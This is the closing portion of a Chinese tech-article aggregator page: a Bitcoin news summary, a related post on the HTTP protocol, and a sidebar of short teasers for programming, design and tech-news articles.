				中介交易 SEO诊断淘宝客 站长团购 云主机 技术大厅 1. 比特币报价单月跳水近40% 虚拟货币热催生风险 比特币也好,莱特币.元宝币也罢,在国内市场上经过一段时间的狂热炒作后,在监管加强后,价格都出现大幅波动. 虚拟货币热催生风险 据新华社电 曾一年间疯涨80倍的虚拟货币比特币正遭遇尴尬:一方面,交易平台遭遇银行及支付机构&quot;设限&quot;,导致比特币行情单月跳水近40%;另一方面,虚拟货币热也催生国内数十种&quot;山寨币&quot;,投资均不乏本金难保风险. 相关阅读: 比特币报价单月			</div>
		</article>
	</section>
				<section>
		<header>
			<h2 class="title">
                <a href="https://www.iamivan.net/a/p8ALdlz.html" rel="bookmark">JSP学习之------&amp;amp&semi;gt&semi;HTTP协议详解</a>
			</h2>
		</header>
		<article class="clearfix">
									<div class="summary">
				Author :Jeffrey  My Blog:http://blog.csdn.net/gueter/  引言                                        HTTP是一个属于应用层的面向对象的协议,由于其简捷.快速的方式,适用于分布式超媒体信息系统.它于1990年提出,经过几年的使用与发展,得到不断地完善和扩展.目前在WWW中使用的是HTTP/1.0的第六版,HTTP/1.1的规范化工作正在进行之中,而且HTTP-NG(Next Generation of			</div>
		</article>
	</section>
	
	</div><!-- /related -->
	


</div>
<!-- /main -->


<aside class="col-md-4">



	<div class="box box-gallery1">
		<div class="box-heading">
			<span>猜你喜欢</span>
		</div>
		<div class="box-content">

									<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/XpmBZaz.html" rel="bookmark" class="title">关联程序-c&num;写的浏览器，问题求教</a>
					<div>
						问题描述 c#写的浏览器,问题求教 我用c#写了一个浏览器.调用的webbrowser控件.写好了安装完了.能关联文件,把后缀为.html的文件编程我自己浏览器的图标,但双击打开html文件的时候,调 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/9bBkLKM.html" rel="bookmark" class="title">移动图标设计教程&colon;快速打造iOS7风格图标</a>
					<div>
						文章描述:我为你准备了一系列指南,能帮你通过简单的步骤打造iOS7风格的图标. 随着近年来iOS7的发布,很多网站和APP都忙于改头换面,来适配这套全新的扁平纤细的iOS设计风格.设计好图标是件棘手的 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/YMRdl8z.html" rel="bookmark" class="title">PhotoShop合成高流水瀑布风景效果图片教程</a>
					<div>
						教程介绍用PhotoShop合成一幅高山流水瀑布风景效果图片,比较简单,喜欢的同学可以学习一下! 效果图: 首先打开山谷图片. 增加画布尺寸. 打开瀑布素材. 拖入文档中,大小位置如下.					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/Xpmg6wb.html" rel="bookmark" class="title">什么才是提高ASP性能的最佳选择（续四）</a>
					<div>
						性能 规则的总结 现在我们来重新总结一下这些规则: * 避免包含ADOVBS.inc文件,用其它方法来使用常量. * 当使用一个单个记录集时,将连接字符串传递到ActiveConnection属性中. ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/M91EQKM.html" rel="bookmark" class="title">MySQL Slave relay&lowbar;log损坏修复过程</a>
					<div>
						时间:2013-04-18 11:32 故障:数据库服务器无故重启,当Slave启动后,报relay_log损坏,SQL线程无法进行. 故障原因:OS的重启,可能会导致relay_log 无法正常同步 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/pnx8V2b.html" rel="bookmark" class="title">AutoCAD五分钟内画一个足球</a>
					<div>
						以前我做过&lt;十分钟内画一个足球&gt;教程,现已过时了.如今参照了&quot;Z10版&quot;的&quot;拉伸足球锥体&quot;方法,省去了频繁的剖切,简便了制作流程,只要四分多钟就能完 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MxPelyM.html" rel="bookmark" class="title">PS鼠绘性感女剑客</a>
					<div>
						教程向三联的朋友们介绍PS鼠绘性感女剑客的教程.绘制的大致过程为:基调.线稿.上色.光源.渲染.合成几个部分来完成.不过具体的绘画过程中又需要把背景给人物分开开画,可以先画好背景再画人物,再整体渲染调 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/pP8OPlp.html" rel="bookmark" class="title">Word文本与表格的相互转换技巧</a>
					<div>
						将文本转换成表格 1.插入分隔符 (分隔符:将表格转换为文本时,用分隔符标识文字分隔的位置,或在将文本转换为表格时,用其标识新行或新列的起始位置.)(例如逗号或制表符),以指示将文本分成列的位置.使用 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/pkGnV7p.html" rel="bookmark" class="title">Axure RP 8怎么利用变量控制标题变化&quest;</a>
					<div>
						        Axure RP 8怎么利用变量控制标题变化?          1.打开Axure RP 8软件,在元件库中找到&quot;二级标题&quot;和&quot;主要按钮&quot;,分 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zVwl9Yb.html" rel="bookmark" class="title">劣质电源导致系统故障</a>
					<div>
						  电脑在使用的过程中,经常出现比较奇怪的故障,比如死机.程序出错.音箱有杂音等.硬盘格式化.重新安装系统,都不能解决问题. 出现这种问题,应该是硬件出现了问题.可以使用替换法进行检查,电源的质量好坏 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MlBqEVz.html" rel="bookmark" class="title">【原创】UDP 与 keepalived 组合使用遇到的问题</a>
					<div>
						问题场景 业务 A(css) -- 通过 UDP 与服务 B 进行交互:   服务 B(logserver)-- 处理来自业务的 UDP 请求,并回复应答:  原本业务 A 和服务 B 分别部署在两台 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/pPP4JZp.html" rel="bookmark" class="title">PostgreSQL压测工具之pgbench-tools使用指南</a>
					<div>
						最近一直在思考,到底贡献些什么给PG社区呢? 作为一名初学者,该给大家展现一些什么样的内容呢?曾经想过写一些入门指南,但是google一下发现已经有不少资料,并且好书也不少,那有什么是比较难找到的,没 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MrWNWmp.html" rel="bookmark" class="title">iOS-私有API与runtime</a>
					<div>
						序 有朋友在做类似iTool的功能,跟我聊起来,这几天闲,就写了一个demo,不是正经做这个,还很粗略,具体干货诸位等这位朋友自己发文吧. DEMO https://github.com/liulis ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MgRkABb.html" rel="bookmark" class="title">小米4手机铃声怎么换 小米手机来电铃声设置</a>
					<div>
						1.我们进入到小米4桌面系统然后点击&quot;设置&quot;下面的&lt;声音和振动&gt;选项,效果如下所示     2.然后在打开进入到的声音与振动界面我们再点击&lt;手机铃声&gt;打开进 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zeR8Gxb.html" rel="bookmark" class="title">怎么用C&num;读取word文档中的图片和文字但不去除文字格式</a>
					<div>
						问题描述 aspx后台代码怎么用C#读取word文档中的图片和文字保留文字格式,求详细代码和操作步骤,求教........ 解决方案 解决方案二:rtf富文本解决方案三:難........解决方案四: ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zOn5qqp.html" rel="bookmark" class="title">URL地址中的&num;符号使用说明&lowbar;javascript技巧</a>
					<div>
						一般我们想让一个a标签点击后执行javascript代码,有以下几种写法: 方式一:&lt;a href=&quot;#&quot; onclick=&quot;alert(1);&quot;&gt; ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/ze0dR0p.html" rel="bookmark" class="title">js ajaxfileupload&period;js上传报错的解决方法&lowbar;javascript技巧</a>
					<div>
						相信大家在工作中经常用到文件上传的操作,因为我是搞前端的,所以这里主要是介绍ajax在前端中的操作.代码我省略的比较多,直接拿js那里的 $.ajaxFileUpload({ url:'www.cod ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zwK99Wz.html" rel="bookmark" class="title">ASP&comma;PHP与&period;NET伪造HTTP-REFERER方法及防止伪造REFERER方法探讨&lowbar;相关技巧</a>
					<div>
						HTTP-REFERER这个变量已经越来越不可靠了,完全就是可以伪造出来的东东. 以下是伪造方法: ASP: 复制代码 代码如下: dim http   set http=server.createo ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MYNYKQp.html" rel="bookmark" class="title">MySQL中使用case when 语句实现多条件查询的方法&lowbar;Mysql</a>
					<div>
						举例如下: 数据表为DemoTable,字段有id, condition1,condition2,condition3,condition4,condition5 要求是查询DemoTable中,co ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/p5QvXRp.html" rel="bookmark" class="title">实例解析JSP中EL表达式的各种运用&lowbar;JSP编程</a>
					<div>
						EL运算符: &lt;%@page language=&quot;java&quot; contentType=&quot;text/html;charset=gb2312&quot;%&gt; &l ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MxEXV0p.html" rel="bookmark" class="title">Caffe代码导读（2）：LMDB简介</a>
					<div>
						闪电般的内存映射型数据库管理(LMDB) 简介 LMDB是基于二叉树的数据库管理库,建模基于伯克利数据库的应用程序接口,但做了大幅精简.整个数据库都是内存映射型的,所有数据获取返回数据都是直接从映射的 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/M9jeLVp.html" rel="bookmark" class="title">64位的win7 安装的oracle 11g 服务器，VS2008 asp&period;net无法访问</a>
					<div>
						问题描述 64位的win7安装的oracle11g服务器,VS2008asp.net程序无法访问数据库,错误说是无法在64位环境下运行32位的客户端件.头大了.helpme. 解决方案 解决方案二:你 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/ze0eEjp.html" rel="bookmark" class="title">java 程序</a>
					<div>
						问题描述 输入带判定语句,得到n个汉字的的序列,s1,s2,....sn.(这句话的意思是输入一首七律诗,相应得到一个汉字序列,该诗中有56个汉字.即n=56).这句话用java怎么实现?					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/bjoRw8M.html" rel="bookmark" class="title">《机器学习系统设计：Python语言实现》一第1章 机器学习的思维</a>
					<div>
						第1章 机器学习的思维机器学习系统具有意义深远且令人兴奋的能力,能够在各种应用领域为人们提供重要的洞察力:从具有开创性的挽救生命的医学研究到宇宙基础物理方面的发现,从为我们提供更健康.更清洁的食物到互 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MgPw26p.html" rel="bookmark" class="title">邯郸高新技术创业服务中心获国家创投机构认证</a>
					<div>
						记者从有关部门获悉,日前,邯郸高新技术创业服务中心获得国家创新基金管理中心2008年度首批创业投资机构的资格审核认定,成为河北省首批获得资格认证的六家投资服务机构之一. 国家创业投资机构的认证通过,将 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/boqOXgp.html" rel="bookmark" class="title">青海移动：玉树用户欠费不停机电话回访</a>
					<div>
						4月14日晚间消息,在青海玉树发生7.1级强烈地震后,中国移动青海公司迅速响应,启动蓝色应急预案,全力保障网络畅通,同时,开展客户关怀,做好抗震灾通信服务工作. 一是欠费不停机.上午9时许,中国移动青 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/pLBwLWb.html" rel="bookmark" class="title">我叫MT4&period;1版本橙卡详细介绍 橙卡技能解读攻略</a>
					<div>
						我叫MT4.1版本橙卡详细介绍 橙卡技能解读攻略 (为了方便玩家攻略存入手机,本人将会陆续制作&quot;一张图系列&quot;,希望大家支持) ps.游戏之余无聊,为自己喜爱的手游制作此系列图,以方 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zenJx8b.html" rel="bookmark" class="title">两个案例告诉你：生鲜电商怎样玩</a>
					<div>
						中介交易 SEO诊断 淘宝客 云主机 技术大厅 &quot;诸橙柳桃潘苹果&quot;似乎让生鲜电商开始玩起概念,创意算是新鲜,让一系列水果与知名企业家扯上了干系,想不出名都难.从营销模式来看,它利用 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MR7dBap.html" rel="bookmark" class="title">【每日人物关注】陈昊芝：马化腾，你怎么能挖我的人&quest;</a>
					<div>
						腾讯,让我说你什么好 记得第一次也是唯一一次见到马化腾,还是2001年初的Donews聚会,当时在一个桌上吃饭,小马哥也就是现在多数创业者的状态,随和.话不多.更多的是听别人在聊什么.而我当时带了手下 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/pkZv65M.html" rel="bookmark" class="title">口碑网创始人李治国出任小奥游戏董事长</a>
					<div>
						[TechWeb]11月9日消息,经小奥游戏城CEO屈于鸿证实,口碑网创始人.雅虎中国原资深总监.阿里巴巴云计算原资深总监李治国已正式出任小奥游戏城董事长.早在9月中旬就曾有知情人士向TechWeb透 ...					</div>
				</div>
			</div>
			
		</div>
	</div>

	<div class="box">
		<div class="box-heading">
			<span>热搜</span>
		</div>
		<div class="box-content">
					</div>
	</div>


</aside>
      </div>
    </div>
    <!-- /.container -->

    <div id="copyright">
      <div class="pull-left">
        &#169; 2024 iVAN        | info#iamivan.net        | 11 q. 0.034 s.
      </div>

    </div>

  </div><!--/.wrapper -->


  <!-- <script src="/assets/js/jquery.js"></script>
  <script src="/assets/js/bootstrap.min.js"></script> -->
  <div style=" display: none ";>
  </div>

<script src="/assets/js/echo.js"></script>
<script>
    echo.init({
      offset: 100,
      throttle: 250,
      unload: false,
      callback: function (element, op) {
        console.log(element, 'has been', op + 'ed')
      }
    });
    </script>
</body>
</html>
